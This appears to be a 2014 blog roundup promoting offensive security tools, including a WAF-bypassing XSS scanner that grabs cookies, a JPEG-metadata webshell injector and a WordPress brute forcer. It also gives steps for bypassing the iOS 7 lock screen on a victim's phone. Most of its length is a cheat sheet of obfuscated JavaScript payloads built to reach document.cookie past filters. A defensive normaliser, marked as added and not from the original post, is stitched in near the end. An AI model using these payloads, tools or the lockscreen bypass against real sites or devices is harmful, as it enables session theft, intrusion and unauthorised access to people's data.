Jun 13, 2014

Tools: ArchAssault v2014.06.01 – Arch Linux ISO for Penetration Testers Released


The ArchAssault Project is an Arch Linux derivative for penetration testers, security professionals and all-around Linux enthusiasts. This means we import the vast majority of the official upstream Arch Linux packages; these packages are unmodified from their upstream source.

While our Arch Linux base is primarily untouched, there are times where we have to fork a package to be able to better support our vast selection of tools. All of our packages strive to maintain the Arch Linux standards, methods and philosophies.

Source: https://archassault.org/download/


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jun 12, 2014

Tools: Pompem - Exploit Searching Tool

Pompem is an open source tool designed to automate the search for exploits in the major databases. Developed in Python, it has an advanced search system that eases the work of pentesters and ethical hackers. In its current version it searches the following databases: Exploit-db, 1337day and Packetstorm Security.

git clone https://github.com/rfunix/Pompem.git Pompem-dev


Source: https://github.com/rfunix/Pompem


Tools: XSSYA - Tool XSS to bypass WAF

XSSYA is a Cross Site Scripting scanner and vulnerability confirmation tool (working with two methods):
• Method 1: confirmation by request and response
• Method 2: confirmation by executing an encoded payload and searching for the same payload, decoded, in the page's HTML
• Supports HTTPS
• After confirmation, executes a payload to get cookies
• Identifies 3 types of WAF (Mod_Security, WebKnight, F5 BIG-IP)
• Runs on Windows and Linux

XSSYA includes a library of encoded payloads for bypassing a WAF (Web Application Firewall). It also supports saving the page's HTML before executing the payload and viewing that HTML on screen or in the terminal.

$ python xssya.py
Links should end with /, = or ?
Example:
$ python xssya.py
http://www.domain.com/ http://www.domain.com= http://www.domain.com?

Source: https://github.com/yehia-mamdouh/XSSYA



Tools: 0verLFI

A simple script to inject webshells into JPEG metadata


Source: https://github.com/0verl0ad/0verLFI



Jun 11, 2014

Tools: WPBF - Wordpress Brute Force Tool


Features


  • Bruteforce using a dictionary file (a small and effective one is provided)
  • Threading for a speed boost of the bruteforce tasks
  • HTTP proxy support
  • Username enumeration/detection (TALSOFT-2011-0526, with fallback to the author's archive page and content parsing)
  • Fetching keywords from the blog's content and using them in the password list
  • WordPress version fingerprinting
  • Detection of known and unknown plugins (including Login LockDown, which makes the bruteforce useless)
  • WordPress remote path detection
  • Advanced logging (with its own configuration file) using Python's logging library

Download: git clone git://github.com/atarantini/wpbf

Source: http://atarantini.github.io/wpbf/



Jun 10, 2014

Howto: Bypass iOS 7 LockScreen & Access ANY iPhone Application

2 requirements for bypassing the iOS 7 lockscreen:
- A missed call
- Access to the Control Panel

1. The victim left an application open before locking the screen (works with Messages, LINE, Facebook).

2. After the screen is locked, switch to airplane mode from the Control Panel.

3. Go to the missed call screen and tap it.

4. Now you are in the application that was open before the screen was locked.


Source: https://www.youtube.com/watch?v=Hg9Vy7XzGZY


Howto: Many ways to obfuscate XSS to get the cookie

window:
window["alert"]("ISR")
window["ale"+(!![]+[])[-~[]]+(!![]+[])[+[]]]()
window["ale"+"\x72\x74"]()
window["\x61\x6c\x65\x72\x74"]()
window['ale'+(!![]+[])[-~[]]+(!![]+[])[+[]]]()
window['ale'+'\x72\x74']()
window['\x61\x6c\x65\x72\x74']()
window[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))
window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]

this alert:
this["alert"]("ISR")
this["ale"+(!![]+[])[-~[]]+(!![]+[])[+[]]]()
this["ale"+"\x72\x74"]()
this["\x61\x6c\x65\x72\x74"]()
this['ale'+(!![]+[])[-~[]]+(!![]+[])[+[]]]()
this['ale'+'\x72\x74']()
this['\x61\x6c\x65\x72\x74']()
this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))
this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]

this document:
this["document"]["cookie"]
this["document"]["\x63\x6f\x6f\x6b\x69\x65"]
this["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["cookie"]
this["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x6f\x6f\x6b\x69\x65"]
this["document"][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"kie"]
this["document"][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"\x6b\x69\x65"]
this["docum"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"\x6b\x69\x65"]
this["docum"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"kie"]
this["docum"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]["\x63\x6f\x6f\x6b\x69\x65"]
this["docum"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]["cookie"]
this["\x64\x6f\x63\x75\x6d"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"\x6b\x69\x65"]
this["\x64\x6f\x63\x75\x6d"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"kie"]
this["\x64\x6f\x63\x75\x6d"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]["\x63\x6f\x6f\x6b\x69\x65"]
this["\x64\x6f\x63\x75\x6d"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]["cookie"]
this['document']['cookie']
this['document']['\x63\x6f\x6f\x6b\x69\x65']
this['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['cookie']
this['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x63\x6f\x6f\x6b\x69\x65']
this['document'][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'kie']
this['document'][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'\x6b\x69\x65']
this['docum'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'\x6b\x69\x65']
this['docum'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'kie']
this['docum'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]['\x63\x6f\x6f\x6b\x69\x65']
this['docum'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]['cookie']
this['\x64\x6f\x63\x75\x6d'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'\x6b\x69\x65']
this['\x64\x6f\x63\x75\x6d'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'kie']
this['\x64\x6f\x63\x75\x6d'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]['\x63\x6f\x6f\x6b\x69\x65']
this['\x64\x6f\x63\x75\x6d'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]['cookie']

document cookie:
document["cookie"]
document["\x63\x6f\x6f\x6b\x69\x65"]
document[({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"kie"]
document[({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"\x6b\x69\x65"]
document['cookie']
document['\x63\x6f\x6f\x6b\x69\x65']
document[({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'kie']
document[({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'\x6b\x69\x65']
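Every expression above resolves to window.alert, this.document.cookie or document.cookie; a signature that looks for those literal strings misses all of them. The following is an added example, not from the original post, of a small normaliser a defender can run over untrusted script before signature matching: it resolves the one-character atoms used above ((!![]+[])[+[]] is "true"[0], i.e. "t"), decodes \xNN escapes and merges concatenated literals, without ever evaluating the input. The names normalizeAccess, ATOMS and SAMPLES are chosen here.

```javascript
// Added example (not from the original post): a textual normaliser that
// resolves the obfuscation tricks listed above so a plain detection rule can
// match window.alert / document.cookie. It never executes the input.

// Each atom is a constant expression that evaluates to one character.
// The values are computed once from this trusted table, never from input.
const ATOMS = [
  ["(!![]+[])[+[]]", (!![]+[])[+[]]],                  // "true"[0]      -> "t"
  ["(!![]+[])[+!![]]", (!![]+[])[+!![]]],              // "true"[1]      -> "r"
  ["(!![]+[])[-~[]]", (!![]+[])[-~[]]],                // "true"[1]      -> "r"
  ["(![]+[])[-~-~[]]", (![]+[])[-~-~[]]],              // "false"[2]     -> "l"
  ["(![]+[])[!+[]+!![]]", (![]+[])[!+[]+!![]]],        // "false"[2]     -> "l"
  ["([][+[]]+[])[-~-~-~[]]", ([][+[]]+[])[-~-~-~[]]],  // "undefined"[3] -> "e"
  ["([][+[]]+[])[!+[]+!![]+!![]]", ([][+[]]+[])[!+[]+!![]+!![]]], // "undefined"[3] -> "e"
  ["([][+[]]+[])[+!![]]", ([][+[]]+[])[+!![]]],        // "undefined"[1] -> "n"
  ["(+{}+[])[-~[]]", (+{}+[])[-~[]]],                  // "NaN"[1]       -> "a"
  ["(+{}+[])[+!![]]", (+{}+[])[+!![]]],                // "NaN"[1]       -> "a"
  ["({}+[])[!+[]+!![]+!![]+!![]+!![]]", ({}+[])[!+[]+!![]+!![]+!![]+!![]]], // "[object Object]"[5] -> "c"
  ["({}+[])[+!![]]", ({}+[])[+!![]]],                  // "[object Object]"[1] -> "o"
].sort((a, b) => b[0].length - a[0].length);           // longest first: no partial matches

const escapeRe = (s) => s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");

// Rewrite obfuscated member access into its canonical dotted form.
function normalizeAccess(src) {
  let out = src;
  // 1. Known one-character atoms become plain string literals.
  for (const [expr, ch] of ATOMS) {
    out = out.replace(new RegExp(escapeRe(expr), "g"), `"${ch}"`);
  }
  // 2. Decode \xNN and \uNNNN escapes inside string literals.
  out = out.replace(/\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})/g,
    (_, x, u) => String.fromCharCode(parseInt(x || u, 16)));
  // 3. Merge concatenated literals: "ale"+"r"+"t" -> "alert".
  const pair = /(["'])((?:(?!\1)[^\\])*)\1\s*\+\s*(["'])((?:(?!\3)[^\\])*)\3/;
  while (pair.test(out)) out = out.replace(pair, (_, q, a, r, b) => `"${a}${b}"`);
  // 4. obj["prop"] / obj['prop'] -> obj.prop so a plain rule can match.
  return out.replace(/\[(["'])([A-Za-z_$][\w$]*)\1\]/g, ".$2");
}

// Constructed samples in the forms listed in the post (String.raw keeps the \x).
const SAMPLES = [
  String.raw`window["ale"+"\x72\x74"]()`,
  String.raw`this['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['cookie']`,
  "window[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))",
];
for (const s of SAMPLES) console.log(normalizeAccess(s));
```

The table only covers the atoms that appear on this page; a production normaliser would need the full JSFuck alphabet and a real tokenizer rather than regexes.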
Source: http://www.scribd.com/doc/226925089/Stylish-XSS-in-Magento-When-Style-helps-you 


